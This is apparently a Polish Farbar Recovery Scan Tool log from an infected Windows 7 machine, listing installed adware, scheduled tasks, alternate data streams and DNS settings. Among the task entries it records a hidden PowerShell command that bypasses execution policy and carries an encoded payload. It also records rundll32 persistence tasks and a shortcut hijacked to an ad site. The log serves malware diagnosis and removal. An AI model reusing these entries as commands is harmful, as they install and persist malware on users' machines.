Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja:04-03-2016 Uruchomiony przez Mateusz (2016-03-04 21:56:20) Uruchomiony z C:\Users\Mateusz\Downloads Windows 7 Ultimate (X64) (2013-06-11 18:42:12) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-2592065745-1446701355-574578764-500 - Administrator - Disabled) Gość (S-1-5-21-2592065745-1446701355-574578764-501 - Limited - Disabled) => C:\Users\Gość HomeGroupUser$ (S-1-5-21-2592065745-1446701355-574578764-1003 - Limited - Enabled) Mateusz (S-1-5-21-2592065745-1446701355-574578764-1000 - Administrator - Enabled) => C:\Users\Mateusz UpdatusUser (S-1-5-21-2592065745-1446701355-574578764-1001 - Limited - Enabled) => C:\Users\UpdatusUser ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: COMODO Antivirus (Enabled - Up to date) {F25D0092-CDBE-B303-ADB7-88DE8CDECCF5} AS: Comodo Defense+ (Enabled - Up to date) {493CE176-EB84-BC8D-9707-B3ACF7598648} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} FW: COMODO Firewall (Enabled) {CA6681B7-87D1-B25B-86E8-21EB720D8B8E} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) 1.0 (HKLM-x32\...\{8FB7E6CF-1554-4A01-ACE4-8BB2417F912F}_is1) (Version: 1.0 PL - Play sp. z o.o.) Adblocker (HKLM-x32\...\{4820778D-AB0D-6D18-C316-52A6A0E1D507}) (Version: 4.3.0.1667 - Adblocker) <==== UWAGA Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.7.0.2090 - Adobe Systems Incorporated) Adobe Flash Player 20 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 20.0.0.306 - Adobe Systems Incorporated) Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.2.122 - Adobe Systems, Inc.) Advertising Center (x32 Version: 0.0.0.1 - Nero AG) Hidden Agricultural Simulator 2012 Demo (HKLM-x32\...\Agrar Simulator 2012 Demo) (Version: - ) Agricultural Simulator 2013 - Demo (HKLM-x32\...\Agricultural Simulator 2013 - Demo) (Version: - ) Aktualizacje NVIDIA 1.11.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 1.11.3 - NVIDIA Corporation) Ask Toolbar (HKLM-x32\...\{4F524A2D-5637-4300-76A7-A758B70C1C01}) (Version: 12.28.1.167 - APN, LLC) <==== UWAGA Attack on Pearl Harbor (HKLM-x32\...\PEARLHDE_is1) (Version: - Legendo Entertainment AB) AVS Video Editor 7.1 (HKLM-x32\...\AVS Video Editor_is1) (Version: 7.1.4.264 - Online Media Technologies Ltd.) Bandicam (HKLM-x32\...\Bandicam) (Version: 2.2.2.790 - Bandisoft.com) Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version: - Bandisoft.com) BestSaveFoorYou (HKLM-x32\...\{F6A71DC7-28F4-C6C7-8FA9-8A56C80FC96A}) (Version: - BestSaveForrYoiu) <==== UWAGA Bing Bar (HKLM-x32\...\{3365E735-48A6-4194-9988-CE59AC5AE503}) (Version: 7.3.132.0 - Microsoft Corporation) Browser AdBlocker (HKLM-x32\...\{37476589-E48E-439E-A706-56189E2ED4C4}_is1) (Version: - Browser AdBlocker) <==== UWAGA CalendarWeek (HKLM-x32\...\{6933C2BA-C67D-42C7-8C77-1FF4B364AF54}) (Version: - "") <==== UWAGA Camtasia Studio 8 (HKLM-x32\...\{A2A41B60-D51F-4C04-BC94-B4C94F7B6DC0}) (Version: 8.6.0.2054 - TechSmith Corporation) Chromodo (HKLM-x32\...\Chromodo) (Version: 48.12.18.238 - Comodo) Coinsave (HKLM-x32\...\{C8AAF59A-6BAA-F68B-9470-A856460A8093}) (Version: - "") <==== UWAGA COMODO Internet Security Premium (HKLM\...\{04833277-EE61-4251-9273-0CF86C0FE710}) (Version: 8.2.0.4792 - COMODO Security Solutions Inc.) Conflict Desert Storm PL (HKLM-x32\...\Conflict Desert Storm PL) (Version: - ) Cookie Clicker Extended (HKLM-x32\...\{B6D700D3-3D0D-FEEB-D675-2CE78F9EC5D6}) (Version: - "") <==== UWAGA Demolition Company Demo (HKLM-x32\...\DemolitionCompanyDemoEN_is1) (Version: - GIANTS Software) DiRT2 (HKLM-x32\...\{F0A421DB-030E-40DE-A3E6-EC340B1074BC}) (Version: 1.00.0000 - Codemasters) DiscountExTTensii (HKLM-x32\...\{B138259A-351E-33FA-2726-8D71704F1DA9}) (Version: - "") <==== UWAGA DNS Unlocker version 1.4 (HKLM-x32\...\{E1527582-8509-4011-B922-29E3FB548882}_is1) (Version: 1.4 - www.dnsunlocker.com) <==== UWAGA Electronic Arts Game Updater (HKLM-x32\...\Electronic Arts Game Updater) (Version: - ) ESR (HKLM-x32\...\ESR_is1) (Version: - ) EXPERTool v8.7 (HKLM-x32\...\{551D9481-9487-4D0C-9A1D-6BC3E7B6D991}_is1) (Version: 8.7.0.1 - Gainward Co. Ltd.) Facebook Video Calling 3.1.0.521 (HKLM-x32\...\{2091F234-EB58-4B80-8C96-8EB78C808CF7}) (Version: 3.1.521 - Skype Limited) Farm Frenzy 2 (HKLM-x32\...\Farm Frenzy 2) (Version: - ) Farming Simulator 15 (HKLM-x32\...\FarmingSimulator2015PL_is1) (Version: 1.1.0.0 - GIANTS Software) Gameo (HKU\S-1-5-21-2592065745-1446701355-574578764-1000\...\Gameo) (Version: 0.14.1 - IronSource Ltd.) <==== UWAGA GeekBuddy (HKLM\...\{4B47ACEB-7529-4B81-A20E-1F8D50F0EED8}) (Version: 4.25.167 - Comodo Security Solutions Inc) Google Update Helper (x32 Version: 1.3.21.99 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.28.1 - Google Inc.) Hidden GS_Sustainer 1.80 (HKLM-x32\...\{5F189DF5-2D05-472B-9091-84D9848AE48B}{4d349a54}) (Version: - Genuine P Software) <==== UWAGA Handset WinDriver 1.03.02.00 (HKLM-x32\...\Handset WinDriver) (Version: 1.03.02.00 - Huawei technologies Co., Ltd.) Hard Truck 18 Wheels of Steel (HKLM-x32\...\Hard Truck 18 Wheels of Steel) (Version: - ) HP Deskjet 2510 series — badanie mające na celu poprawę produktów (HKLM\...\{6FD53CD7-D402-4328-9885-8401266D237D}) (Version: 28.0.1313.0 - Hewlett-Packard Co.) HP Deskjet 2510 series — podstawowe oprogramowanie urządzenia (HKLM\...\{F0DD70C6-B53F-42B5-8A67-62863E6E5EEF}) (Version: 28.0.1313.0 - Hewlett-Packard Co.) HP Deskjet 2510 series Pomoc (HKLM-x32\...\{BD366B89-6784-4636-9D01-291C2016912A}) (Version: 27.0.0 - Hewlett Packard) HP Deskjet 2510 series Setup Guide (HKLM-x32\...\{216C7F38-4BBC-4E9A-8392-C9FA21B54386}) (Version: 27.0.0 - Hewlett Packard) HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP) HP Update (HKLM-x32\...\{6F1C00D2-25C2-4CBA-8126-AE9A6E2E9CD5}) (Version: 5.003.003.001 - Hewlett-Packard) Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation) Intel(R) Smart Connect Technology 3.0 x64 (HKLM\...\{EE21578E-DE14-46D5-83D7-EA4D347B2F9A}) (Version: 3.0.30.1526 - Intel) Iron Man Lego Adventures (HKLM-x32\...\{D238A788-39B6-B97D-A5BA-13FE8E34E03C}) (Version: - "") <==== UWAGA Java 7 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217060FF}) (Version: 7.0.600 - Oracle) John Deere Drive Green (HKLM-x32\...\John Deere Drive Green/PL-Polish_is1) (Version: - City Interactive) KartingRace v1.02 (HKLM-x32\...\KartingRace_is1) (Version: - steinware) Kurka Wodna 3 (HKLM-x32\...\Kurka Wodna 3) (Version: - ) Landwirtschafts Simulator 2011 Demo (HKLM-x32\...\FarmingSimulator2011DemoDE_is1) (Version: 1.0 - GIANTS Software) LiveSupport (HKLM-x32\...\LiveSupport_is1) (Version: 1.2.8.0 - PC Utilities Software Limited) <==== UWAGA Maszyny Rolnicze 2013 wersja 1.41 (HKLM-x32\...\{60DAF499-12DC-436E-89C0-49A78FAFA363}_is1) (Version: 1.41 - PlayWay S.A.) Maszyny Rolnicze 2014 wersja 1.0 (HKLM-x32\...\{13400B85-CF99-4D5E-9356-EB43BB26393A}_is1) (Version: 1.0 - PlayWay S. A.) Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation) Microsoft Games for Windows - LIVE (HKLM-x32\...\{4CB52D2C-1857-4D6C-99C8-4D3F8FC6E124}) (Version: 3.1.173.0 - Microsoft Corporation) Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{6F05332E-6063-4FB9-9233-0577B01E124A}) (Version: 3.1.89.0 - Microsoft Corporation) Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) MS2 Extreme Mod v.0.8 wersja 0.8 (HKLM-x32\...\{9FCF4FFB-5862-4F64-8F79-782BF4842FD7}_is1) (Version: 0.8 - Jakub 'Maly' Strelcow) Need for Speed (HKLM-x32\...\Need for Speed High Stakes) (Version: - ) Nero 9 Essentials (HKLM-x32\...\{300bd9d7-7e81-4b0a-b33f-d3f688460a8d}) (Version: - Nero AG) Next Car Game Free Technology Demo (HKLM-x32\...\Next Car Game Free Technology Demo) (Version: - Bugbear Entertainment) Niezbędnik rowerzysty (HKLM-x32\...\{4849E74C-3408-467A-AF8B-F3DEC3C07542}) (Version: 1.00.0000 - YDP) NSR-Stage 1 (HKLM-x32\...\NSR-Stage 1) (Version: 0.2.0.1 - Game Seed/Ai Wave) NVIDIA Oprogramowanie systemu PhysX 9.12.1031 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.12.1031 - NVIDIA Corporation) NVIDIA Sterownik 3D Vision 310.90 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 310.90 - NVIDIA Corporation) NVIDIA Sterownik dźwięku HD 1.3.18.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.18.0 - NVIDIA Corporation) NVIDIA Sterownik graficzny 310.90 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 310.90 - NVIDIA Corporation) NVIDIA Sterownik kontrolera 3D Vision 310.90 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 310.90 - NVIDIA Corporation) OpenAL (HKLM-x32\...\OpenAL) (Version: - ) Opera Stable 35.0.2066.92 (HKLM-x32\...\Opera 35.0.2066.92) (Version: 35.0.2066.92 - Opera Software) Optimizer Pro v3.2 (HKLM-x32\...\Optimizer Pro_is1) (Version: - ) <==== UWAGA Panel sterowania NVIDIA 310.90 (Version: 310.90 - NVIDIA Corporation) Hidden PC_Booster (HKLM-x32\...\S-493389286) (Version: 3.2.0.1833 - PremiumSoft) <==== UWAGA PC_Sustainer 1.80 (HKLM-x32\...\{5F189DF5-2D05-472B-9091-84D9848AE48B}{248642b4}) (Version: - Certified Publisher) <==== UWAGA Picexa (HKLM-x32\...\Picexa) (Version: - Taiwan Shui Mu Chih Ching Technology Limited) <==== UWAGA Rapture3D 2.3.22 Game (HKLM-x32\...\{D2FCA41E-AC01-4DCD-B3A7-DC9E32363065}}_is1) (Version: - Blue Ripple Sound) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.53.216.2012 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6657 - Realtek Semiconductor Corp.) Redirect Path (HKLM-x32\...\{329619A6-0FF7-254C-690B-CFD7C057F0F9}) (Version: - "") <==== UWAGA SafeFinder (HKLM-x32\...\{F5607C61-1EC8-4351-9D5E-C0CA6CB7BA03}) (Version: 1.0.0.0 - Linkury) <==== UWAGA Settings Manager (HKLM-x32\...\Settings Manager) (Version: 5.0.0.12302 - Aztec Media Inc) <==== UWAGA SimpleClear (HKLM-x32\...\{274E3C5C-178E-EAE2-A52F-2863C0EECD46}) (Version: - "") <==== UWAGA Skoki narciarskie 2004 (HKLM-x32\...\Skoki narciarskie 2004) (Version: - ) SpinTires Tech Demo (June 060613) (HKLM-x32\...\{9AF7D6F5-50A5-432C-9F7B-83BCE03B11A0}) (Version: 1.3 - Oovee) Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation) Super-Charger (HKLM-x32\...\{7CDF10DD-A9B5-4DA3-AB95-E193248D4369}_is1) (Version: 1.2.012 - MSI) swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden Symulator Śmigłowców Ratunkowych wersja 2.0 (HKLM-x32\...\{590B031A-4935-47A9-A6DD-7377DDB2ED3A}_is1) (Version: 2.0 - PlayWay S.A.) TakeTheCouupon (HKLM-x32\...\{53B21E29-3967-C332-57EB-C02631658584}) (Version: - "") <==== UWAGA Total Commander (Remove or Repair) (HKLM-x32\...\Totalcmd) (Version: 7.56a - Ghisler Software GmbH) Traktory - Puchar Sołtysa 1.0 (HKLM-x32\...\{7625AFA5-81FF-4FCD-B30F-4F8706202C8F}_is1) (Version: - Play sp. z o.o.) Trucker 2 (HKLM-x32\...\{9E2A65EE-163D-4EF8-9CF0-7CB3D123E8DC}_is1) (Version: - Play sp. z o.o.) Unity Web Player (HKU\S-1-5-21-2592065745-1446701355-574578764-1000\...\UnityWebPlayer) (Version: 5.3.1f1 - Unity Technologies ApS) Update for PriceFountain (HKU\S-1-5-21-2592065745-1446701355-574578764-1000\...\Price Fountain) (Version: - Update for PriceFountain) <==== UWAGA WarThunder (HKU\S-1-5-21-2592065745-1446701355-574578764-1000\...\WarThunder) (Version: - WarThunder) <==== UWAGA WinRAR 4.20 (64-bitowy) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH) WinRAR 5.30 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH) WinZipper (HKLM-x32\...\WinZipper) (Version: 1.5.139 - Taiwan Shui Mu Chih Ching Technology Limited.) <==== UWAGA WR2 Demo Skoda (HKLM-x32\...\InstallShield_{16C27441-5189-4F06-855D-FDF2D8224E57}) (Version: 1.3.2 - Synetic) WR2 Demo Skoda (x32 Version: 1.3.2 - Synetic) Hidden ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {1C9BD23C-0417-42AD-ACFB-7FD1937D44B9} - System32\Tasks\COMODO\COMODO Update {A6D52E4F-569B-4756-B3D8-DF217313DA85} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2015-08-05] (COMODO) Task: {1FBCC6AB-81B6-4CB7-AF2F-1C593901A14F} - System32\Tasks\COMODO\COMODO Scan {F140D794-60B6-4F00-9235-D6457AA25B22} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2015-08-05] (COMODO) Task: {2260478F-5EB0-4656-A48A-A799F23746A5} - System32\Tasks\DNSVINCENTOWN => dnsvincentown.exe <==== UWAGA Task: {3647BBB6-C7AA-4596-8224-6DEA35802DC7} - System32\Tasks\COMODO\COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2015-08-05] (COMODO) Task: {425878F8-2FFB-4AEA-9BF1-EB90832FA952} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-2592065745-1446701355-574578764-1000Core => C:\Users\Mateusz\AppData\Local\Facebook\Update\FacebookUpdate.exe [2014-07-02] (Facebook Inc.) Task: {52130E10-6F19-4313-BFC5-A608E3D82FD9} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-10] (Adobe Systems Incorporated) Task: {5D350806-B7FD-4C26-B69E-4DA02E1C32BE} - System32\Tasks\{B015BCA4-5FB7-4598-8A35-F21DF15780BE} => F:\AUTORUN.EXE Task: {6C05DF36-166F-4485-A812-B294FBE155A1} - System32\Tasks\MateuszDogwoodsAllotrophicV2 => Rundll32.exe JungliestNotices.dll,main 7 1 <==== UWAGA Task: {743CF488-6539-40AE-A794-6AEFDB897F61} - System32\Tasks\{11570C2B-1E65-49E7-9DA8-F3926615DDE0} => pcalua.exe -a C:\PROGRA~2\SKOKIN~1\UNWISE.EXE -c C:\PROGRA~2\SKOKIN~1\INSTALL.LOG Task: {7E441110-F428-4025-9AE9-9FFDCBFE10F2} - System32\Tasks\Optimizer Pro Schedule => C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe [2014-07-14] (PC Utilities Software Limited) <==== UWAGA Task: {7EABADB0-1FC8-4F3B-AE88-22D7F70D9B5F} - System32\Tasks\HPCustParticipation HP Deskjet 2510 series => C:\Program Files\HP\HP Deskjet 2510 series\Bin\HPCustPartic.exe [2012-10-02] (Hewlett-Packard Co.) Task: {87B3A426-E696-4D60-B0F2-5B744090B609} - System32\Tasks\{BB9D10B0-C092-9144-2562-5B1F2AF6BB56} => /s /n /i:"/rt" "C:\PROGRA~3\19bd648d\e3837d5.dll" Task: {963587FF-9DA4-4163-9BAC-D1E62FA4B9F3} - System32\Tasks\COMODO\COMODO Cache Builder {0FB77674-7905-4F34-A362-C5A9A26F8CF9} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2015-08-05] (COMODO) Task: {A9329F9C-65BB-44CE-A221-3880919F7960} - System32\Tasks\Opera scheduled Autoupdate 1436458504 => C:\Program Files (x86)\Opera\launcher.exe [2016-03-04] (Opera Software) Task: {BF07188C-3D79-4C0A-9C29-FF2EF521B521} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_20_0_0_306_pepper.exe [2016-02-10] (Adobe Systems Incorporated) Task: {CA73DAA8-B4B2-412D-9F29-115299F4C0FC} - System32\Tasks\COMODO\COMODO Signature Update {B9D5C6F9-17D2-4917-8BD0-614BAA1C6A59} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2015-08-05] (COMODO) Task: {D6B9FA33-21BA-4BD6-8ED1-5B59309ADB39} - System32\Tasks\{2001B3E2-13EA-325E-67CD-326B5F28D0F3} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMA (dane wartości zawierają 7492 znaków więcej). Task: {E7557CB9-CBFC-4085-B436-BD7356BC77A4} - System32\Tasks\{4051B93D-41A6-4791-9CFC-87B6BA5D9876} => pcalua.exe -a "C:\Program Files (x86)\AskPartnerNetwork\Toolbar\APNSetup.exe" -d C:\Windows\system32 -c /ucheck=ORJ-V7C /cbid=BBE /dtid=^OSJ000^YY^PL /guid=3F6416EA-A8B1-4B84-9276-5C73D9C4F383 /pvresion=12.16.1.29 /platform=V7 Task: {FAE835B5-4811-483C-AC65-7B7681E5AECF} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-2592065745-1446701355-574578764-1000UA => C:\Users\Mateusz\AppData\Local\Facebook\Update\FacebookUpdate.exe [2014-07-02] (Facebook Inc.) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) Task: C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_20_0_0_306_pepper.exe Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-2592065745-1446701355-574578764-1000Core.job => C:\Users\Mateusz\AppData\Local\Facebook\Update\FacebookUpdate.exe Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-2592065745-1446701355-574578764-1000UA.job => C:\Users\Mateusz\AppData\Local\Facebook\Update\FacebookUpdate.exe ==================== Skróty ============================= (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) ShortcutWithArgument: C:\Users\Mateusz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yoursites123.com/?type=sc&ts=1450953473&z=076c653b6098ee4e31a3e29g8z9wde9t8w2c9z3m1g&from=wpm07173&uid=ST3750640NS_5QD2T1RXXXXX5QD2T1RX ==================== Załadowane moduły (filtrowane) ============== 2013-06-11 20:21 - 2012-12-29 09:40 - 00087480 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2012-07-24 09:43 - 2012-07-24 09:43 - 00146984 _____ () C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTAgent.exe 2012-07-24 09:43 - 2012-07-24 09:43 - 00058920 _____ () C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\NetworkHeuristic.dll 2016-02-08 12:01 - 2016-02-08 12:01 - 01291312 _____ () C:\Program Files\COMODO\GeekBuddy\QtNetwork4.dll 2016-02-08 12:01 - 2016-02-08 12:01 - 02883120 _____ () C:\Program Files\COMODO\GeekBuddy\QtCore4.dll 2016-02-08 12:01 - 2016-02-08 12:01 - 10459184 _____ () C:\Program Files\COMODO\GeekBuddy\QtGui4.dll 2016-02-08 12:02 - 2016-02-08 12:02 - 00046640 _____ () C:\Program Files\COMODO\GeekBuddy\imageformats\qgif4.dll 2015-06-18 13:29 - 2015-06-18 13:29 - 08016081 _____ () C:\Program Files (x86)\Stout International\Stout International.exe 2016-02-08 12:01 - 2016-02-08 12:01 - 01536560 _____ () C:\Program Files\COMODO\GeekBuddy\QtScript4.dll 2015-01-08 22:02 - 2015-01-08 22:02 - 00067808 _____ () C:\Program Files\COMODO\COMODO Internet Security\scanners\smart.cav 2013-06-11 19:57 - 2012-06-25 03:41 - 01198912 ____R () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll 2016-03-04 20:37 - 2016-03-01 08:10 - 62332456 _____ () C:\Program Files (x86)\Opera\35.0.2066.92\opera.dll 2016-03-04 20:37 - 2016-03-01 08:09 - 02074664 _____ () C:\Program Files (x86)\Opera\35.0.2066.92\libglesv2.dll 2016-03-04 20:37 - 2016-03-01 08:09 - 00081960 _____ () C:\Program Files (x86)\Opera\35.0.2066.92\libegl.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) AlternateDataStreams: C:\ProgramData:NT [40] AlternateDataStreams: C:\ProgramData:NT2 [322] AlternateDataStreams: C:\Windows\grep.exe:$CmdTcID [64] AlternateDataStreams: C:\Windows\MBR.exe:$CmdTcID [64] AlternateDataStreams: C:\Windows\NIRCMD.exe:$CmdTcID [64] AlternateDataStreams: C:\Windows\PEV.exe:$CmdTcID [64] AlternateDataStreams: C:\Windows\sed.exe:$CmdTcID [64] AlternateDataStreams: C:\Windows\SWREG.exe:$CmdTcID [64] AlternateDataStreams: C:\Windows\SWSC.exe:$CmdTcID [64] AlternateDataStreams: C:\Windows\SWXCACLS.exe:$CmdTcID [64] AlternateDataStreams: C:\Windows\zip.exe:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\Drivers\CFRMD.sys:$CmdTcID [130] AlternateDataStreams: C:\Users\All Users:NT [40] AlternateDataStreams: C:\Users\All Users:NT2 [322] AlternateDataStreams: C:\ProgramData\Application Data:NT [40] AlternateDataStreams: C:\ProgramData\Application Data:NT2 [322] AlternateDataStreams: C:\ProgramData\Dane aplikacji:NT [40] AlternateDataStreams: C:\ProgramData\Dane aplikacji:NT2 [322] AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40] AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [322] AlternateDataStreams: C:\ProgramData\TEMP:373E1720 [131] AlternateDataStreams: C:\Users\Mateusz\Dane aplikacji:NT [40] AlternateDataStreams: C:\Users\Mateusz\Dane aplikacji:NT2 [322] AlternateDataStreams: C:\Users\Mateusz\Desktop\ComboFix.exe:$CmdTcID [64] AlternateDataStreams: C:\Users\Mateusz\Desktop\ComboFix.exe:$CmdZnID [26] AlternateDataStreams: C:\Users\Mateusz\Downloads\e8i0piq6.exe:$CmdTcID [64] AlternateDataStreams: C:\Users\Mateusz\Downloads\e8i0piq6.exe:$CmdZnID [26] AlternateDataStreams: C:\Users\Mateusz\Downloads\FRST64.exe:$CmdTcID [64] AlternateDataStreams: C:\Users\Mateusz\Downloads\FRST64.exe:$CmdZnID [26] AlternateDataStreams: C:\Users\Mateusz\AppData\Roaming:NT [40] AlternateDataStreams: C:\Users\Mateusz\AppData\Roaming:NT2 [322] ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) ==================== EXE - Powiązania (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) ==================== Hosts - zawartość: =============================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2009-07-14 03:34 - 2016-03-04 21:36 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 localhost ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-2592065745-1446701355-574578764-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Mateusz\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg HKU\S-1-5-21-2592065745-1446701355-574578764-501\Control Panel\Desktop\\Wallpaper -> C:\Users\Gość\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 82.163.142.6 - 95.211.158.133 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Zapora systemu Windows [funkcja wyłączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == (Obecnie brak automatycznej naprawy dla tej sekcji.) MSCONFIG\Services: 248642b4 => 2 MSCONFIG\Services: 29850aa3 => 2 MSCONFIG\Services: 4d349a54 => 2 MSCONFIG\Services: BBSvc => 2 MSCONFIG\Services: BBUpdate => 3 MSCONFIG\Services: SmdmFService => 2 MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^iSCTsysTray.lnk => C:\Windows\pss\iSCTsysTray.lnk.CommonStartup MSCONFIG\startupfolder: C:^Users^Mateusz^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Powiadomienia monitorowania tuszu - HP Deskjet 2510 series.lnk => C:\Windows\pss\Powiadomienia monitorowania tuszu - HP Deskjet 2510 series.lnk.Startup MSCONFIG\startupreg: ApnTBMon => "C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe" MSCONFIG\startupreg: CIS_{15198508-521A-4D69-8E5B-B94A6CCFF805} => 